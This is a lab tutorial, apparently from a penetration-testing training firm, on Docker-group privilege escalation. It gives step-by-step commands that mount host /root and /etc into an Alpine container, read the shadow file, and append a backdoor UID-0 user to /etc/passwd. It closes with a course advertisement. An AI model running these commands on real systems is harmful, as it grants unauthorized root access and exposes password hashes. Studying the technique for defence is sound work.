Introduction

Today you will learn how to escalate the root shell if Docker is running on the host machine, or I should
say, Docker privilege escalation to spawn a root shell. While we know that there is an issue with Docker,
all the commands in Docker require sudo, as Docker needs root to run. The Docker daemon works in such
a way that it allows access to the root user or any other user in the particular docker group. This shows
that access to the Docker group is the same as giving constant root access without any password.

Quick Lab setup

Execute the below command to install Docker on your localhost machine. I have used Ubutnu 18.04 here
as a target machine.

apt install docker.io

Create a local user, say Ignite, is the username with the least privileges, add new group "docker" for
"ignite".

adduser ignite
usermod -G docker ignite
newgrp docker

Page 2 of 6
To proceed to privilege escalation, you should have local access to the host machine. Therefore, here we
choose ssh to access the machine as ignite, who is a local user on this machine.

ssh [email protected]
id

As we have access to the user who is a part of the Docker group, as said above, if the user is part of the
Docker group, then it is the same as giving constant root access without any password. We ran the
command shown below. This command obtains the Alpine image from the Docker Hub Registry and runs
it. The –v parameter specifies that we want to create a volume in the Docker instance. The –it parameters
put the Docker into shell mode rather than starting a daemon process. The instance is set up to mount
the root filesystem of the target machine to the instance volume, so when the instance starts, it
immediately loads a chroot into that volume. This gives us the root of the machine. After running the
command, we traversed into the /mnt directory and found flag.txt.

docker run -v /root:/mnt -it alpine

id
cd /mnt
ls
cat flag.txt

Page 3 of 6
Similarly, an intruder can mount other system files to escalate the privileges of the local user, such as
the passwd, shadow, or ssh-key. As you can see here, we try to mount/etc directory to obtain the

shadow file, and similarly, one can access the passwd file and add their own privilege user.

docker run -v /etc/:/mnt -it alpine

cd /mnt
cat shadow

Page 4 of 6
So, if you have access to shadow files, then you can try to crack passwd hashes, and if you have access to
passwd files, you can add your own privilege user by generating a password salt as shown here.

openssl passwd -1 -salt raj

Page 5 of 6
Now a new record inside the passwd file for your user.

docker run -v /etc/:/mnt -it alpine

cd /mnt
echo 'raj:saltpasswd:0:0::/root:/bin/bash' >>passwd
tail passwd
su raj
id

From the given below image, you can observe that now we have user raj as a member of the root. Thus,
we switch to Raj and access the root shell. Thus, in this way, we can increase the permission of a host
machine.

Page 6 of 6
 JOIN OUR
TRAINING PROGRAMS
H ERE
CLICK BEGINNER

Bug Bounty Network Security

Ethical Hacking Essentials

Network Pentest
Wireless Pentest

ADVANCED

Burp Suite Pro Web Pro Computer

Services-API Infrastructure VAPT Forensics

Advanced CTF
Android Pentest Metasploit

EXPERT

Red Team Operation

Privilege Escalation
APT’s - MITRE Attack Tactics
Windows
Active Directory Attack
Linux
MSSQL Security Assessment

www.ignitetechnologies.in